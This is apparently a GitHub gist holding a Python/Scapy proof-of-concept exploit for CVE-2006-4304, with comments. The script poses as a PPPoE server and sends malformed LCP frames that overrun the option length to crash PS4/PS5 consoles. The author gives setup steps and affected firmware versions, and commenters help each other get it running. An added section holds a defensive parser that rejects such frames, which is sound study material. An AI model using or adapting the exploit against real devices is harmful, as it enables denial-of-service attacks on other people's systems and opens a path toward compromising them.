@RobbedColek
Created January 30, 2024 16:02
PoC of CVE-2006-4304 for PS4/PS5
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump

# Replace each \xXX with one two-digit hex byte of the real address, e.g. b"\x00\x11\x22\x33\x44\x55"
source = b"\xXX\xXX\xXX\xXX\xXX\xXX"       # MAC address of your adapter on PC
destination = b"\xXX\xXX\xXX\xXX\xXX\xXX"  # MAC address of LAN on your PS4
interface = "Realtek PCIe 2.5GbE Family Controller #2"  # get via "ipconfig /all" on Windows, or eth0 or similar on Linux

# Discovery stage: wait for the console's PADI and reuse its second tag (expected to be Host-Uniq) in our replies
packet = sniff(iface=interface, filter="pppoed", count=1)
tag_value = packet[PPPoED][0].tag_list[1].tag_value
# PADO (EtherType 0x8863, code 0x07, session 0, length 12) carrying a Host-Uniq tag (0x0103, length 8)
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
# Wait for the PADR, then answer with a PADS (code 0x65) assigning session ID 1
packet = sniff(iface=interface, filter="pppoed", count=1)
payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
# Session stage: wait for the first PPPoE session frame, then send an LCP Configure-Request
# (PPPoE length 9, PPP protocol 0xc021, LCP length 7) whose single option claims length 0xff
packet = sniff(iface=interface, filter="pppoes", count=1)
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
packet = srp1(Ether(payload), iface=interface)
hexdump(packet)  # hexdump() prints the reply itself; wrapping it in print() only adds a trailing "None"
# The same frame with 256 trailing bytes, sent repeatedly
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256  # this number might be different, just a guess
for i in range(20):
    sendp(payload, iface=interface)
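The LCP frames at the end of the script declare an LCP length of 7 but carry an option whose length byte is 0xff, so any receiver that trusts the option's length byte reads past the end of the packet. The parser below is an added example and not part of the gist: it walks the PPPoE session, PPP and LCP headers with the bounds checks a PPP implementation or an IDS rule needs, and reports why it rejects the script's frames, which are rebuilt here with constructed placeholder MACs. It handles any LCP frame, including the NIC-padded and 256-byte variants the script sends.

```python
import struct

DST = bytes.fromhex("020000000002")  # constructed placeholder console MAC
SRC = bytes.fromhex("020000000001")  # constructed placeholder PC MAC
# Well-formed LCP Configure-Request with one MRU option (type 1, length 4, value 1500)
GOOD_FRAME = DST + SRC + b"\x88\x64\x11\x00\x00\x01\x00\x0a\xc0\x21\x01\x01\x00\x08\x01\x04\x05\xdc"
# The gist's first LCP frame (LCP length 7, option length 0xff); ljust() mimics NIC padding to 60 bytes
BAD_FRAME = (DST + SRC + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff").ljust(60, b"\x00")
# The gist's repeated frame: the same headers followed by 256 bytes of 0xff
OVERSIZED_FRAME = DST + SRC + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256


def parse_pppoe_lcp(frame):
    """Return (lcp_code, identifier, [(option_type, option_data), ...]) or raise ValueError."""
    if len(frame) < 26:  # Ethernet 14 + PPPoE 6 + PPP protocol 2 + LCP header 4
        raise ValueError("frame too short for Ethernet + PPPoE + PPP + LCP headers")
    if frame[12:14] != b"\x88\x64":
        raise ValueError("not a PPPoE session frame (EtherType 0x8864)")
    ver_type, code, _session, length = struct.unpack("!BBHH", frame[14:20])
    if ver_type != 0x11 or code != 0x00:
        raise ValueError("unexpected PPPoE version/type/code")
    if length < 6 or length > len(frame) - 20:
        raise ValueError("PPPoE length %d inconsistent with %d payload bytes present" % (length, len(frame) - 20))
    payload = frame[20:20 + length]  # discard Ethernet padding beyond the declared length
    if payload[:2] != b"\xc0\x21":
        raise ValueError("PPP protocol is not LCP (0xc021)")
    lcp = payload[2:]
    lcp_code, ident, lcp_len = struct.unpack("!BBH", lcp[:4])
    if lcp_len < 4 or lcp_len > len(lcp):
        raise ValueError("LCP length %d inconsistent with %d bytes present" % (lcp_len, len(lcp)))
    options, pos = [], 4
    while pos < lcp_len:
        if lcp_len - pos < 2:
            raise ValueError("truncated option header at offset %d" % pos)
        opt_type, opt_len = lcp[pos], lcp[pos + 1]
        # The check an LCP parser must not skip: an option is at least 2 bytes and ends inside the LCP packet
        if opt_len < 2 or pos + opt_len > lcp_len:
            raise ValueError("option 0x%02x length %d overruns LCP packet (%d bytes left)"
                             % (opt_type, opt_len, lcp_len - pos))
        options.append((opt_type, lcp[pos + 2:pos + opt_len]))
        pos += opt_len
    return lcp_code, ident, options


def reject_reason(frame):
    """None when the frame parses cleanly, otherwise why a receiver or IDS rule should drop it."""
    try:
        parse_pppoe_lcp(frame)
        return None
    except ValueError as exc:
        return str(exc)
```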
@RobbedColek
Author

Requires Python 3 and Scapy.

  1. Connect your PS4/PS5 directly to PC via LAN cable.
  2. Set up your PS4/PS5 for manual ethernet connection via PPPoE - insert any username/password.
  3. Use "Test Internet Connection" on console.
  4. Launch script.

If it worked, it will crash your console.

Should work on PS4 11.00 and lower, PS5 8.20 and lower.

This is supposedly what theflow0 reported on HackerOne.

@Sergb1970

Hello.
I get the following error.
What am I doing wrong?

Python 3.12.1 (tags/v3.12.1:2305ca5, Dec 7 2023, 22:03:25) [MSC v.1937 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license()" for more information.

Warning (from warnings module):
File "C:\ps5\PS4-PS5-CVE-2006-4304.py", line 3
source = b"\d8\5e\d3\78\cf\24" # MAC address of your adapter on PC
SyntaxWarning: invalid escape sequence '\d'

Warning (from warnings module):
File "C:\ps5\PS4-PS5-CVE-2006-4304.py", line 4
destination = b"\5c\84\3c\ca\fc\92" # MAC address of LAN on your PS4
SyntaxWarning: invalid escape sequence '\8'

Thank you

@ps3120

ps3120 commented Jan 31, 2024

You spelled the MAC wrong; you have to put x first, for example x5c.

@Sergb1970

Thank you

@V121Coffe

C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:3: SyntaxWarning: invalid escape sequence '\D'
source = b"\D8\BB\C1\B5\C9\96" # MAC address of your PC adapter
C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:4: SyntaxWarning: invalid escape sequence '\9'
destination = b"\bc\60\a7\1a\96\c2" # The MAC address of the local network on your PS4
Traceback (most recent call last):
File "C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py", line 7, in <module>
packet = sniff(iface=interface, filter="pppoed", count=1)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py", line 1311, in sniff
sniffer._run(*args, **kwargs)
File "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py", line 1171, in _run

How to fix it?

@authrequest

Read his solution above. You need the x in front of the characters.

@V121Coffe


[image: screenshot 2024-01-31 233725]
?

@ps3120

ps3120 commented Jan 31, 2024

Wake up, x in front of the MAC characters.

@kinglew1989

C:\Users\REY>"C:\Python30\PS4-PS5-CVE-2006-4304.py"
.
Sent 1 packets.
.
Sent 1 packets.
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets

After it shuts down my PS5 on 6.02. What's next?

@8pcd

8pcd commented Feb 1, 2024

Bro, it's a PoC, meaning piece of concept, no full jailbreak, you have to wait!

@Sergb1970

Sergb1970 commented Feb 1, 2024

Does the cable need to be straight or reverse?

@MRiCEQB

MRiCEQB commented Feb 1, 2024

Does the cable need to be straight or reverse?

PS4/5 can do Auto MDI-X, so it doesn't matter.

@lollipop6969

Proof of concept.

@Drocto1231

Will 11.02 be available?

@lewiwiii

lewiwiii commented Feb 2, 2024

Will 11.02 be available?

No, this bug has been patched in 11.02.

@mbcrump

mbcrump commented Feb 6, 2024

I've made a video showing how to set this up from scratch if anyone is interested.

https://www.youtube.com/watch?v=RbGOJGAD0xQ

@unaigonzalezz

If anyone is curious, it's working on PS5 7.61.

@sunzhi778

Zero zero zero zero
